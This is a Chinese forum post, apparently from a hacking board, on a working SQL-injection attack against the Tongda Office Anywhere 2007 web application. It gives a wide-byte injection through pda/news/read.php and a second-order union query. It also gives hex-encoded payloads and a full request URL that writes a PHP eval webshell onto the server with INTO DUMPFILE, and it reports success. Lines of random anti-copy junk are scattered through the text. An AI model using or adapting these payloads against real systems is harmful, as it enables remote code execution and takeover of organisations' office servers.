目前测试通达OA2007版本
% A- f" y: F$ B4 ?% I, A% P& s
" V, d6 `/ |0 y" P( B" ^1 P
' f4 y4 w4 w2 c0 \" h9 M4 ]' Z5 SOffice Anywhere 2007 网络智能办公系统
( q( y, ~7 u% ?* g! V y1 x; g `" ^
http://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..
# Z2 Q' M9 q( T
0 e, H& w: C% A+ o% F5 x' z
5 W* e; t, ]; B7 B0 x5 {% C Z这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的. x# _* ^& l5 x9 k! x- v: z" H0 j7 X
! ^- x, } h3 c5 _7 @/ F9 N5 l
例如:SELECT * from USER where USER_ID='{$USERNAME}'
! v( X n% u/ Q其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了, e. Z+ v6 P3 P+ T3 Y% K6 c- _
! x6 g6 W: G+ b2 L& T% Q
这个时候我们是不是可以组合起来使用哪?9 v' U( T% _- [3 t1 H! P
4 X& b( K3 b% w8 v$ _4 o: w
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
, H9 e; N- Y) N+ r# @# h5 t2 qunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
; r$ k" ^) m M ) P0 k/ C" ]) c# l9 R) N
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了0 Z# {/ t$ @/ a) J. }5 S
) @/ P3 h% b0 w6 a( ?
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
9 K4 B) A/ ~4 I- q( L
6 k0 H$ \: A: m3 d8 R& p那么我们用字符串格式带入进行hex编码. \( O1 m" X p! U' A
- x5 G0 D: Q5 t2 T. Z
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23* D7 \8 E9 K8 P7 ~9 H D7 T$ w) }
% r5 T# j5 X. H
测试ok,获取oa的webshell
M- M( z1 P. i1 J. M# m3 X ) q+ D7 I' _, n$ i. q1 [. _& g; |
8 p: s4 k( Z2 _! {, E8 j7 C
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23" H) c: ^, h* @. c! o
直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对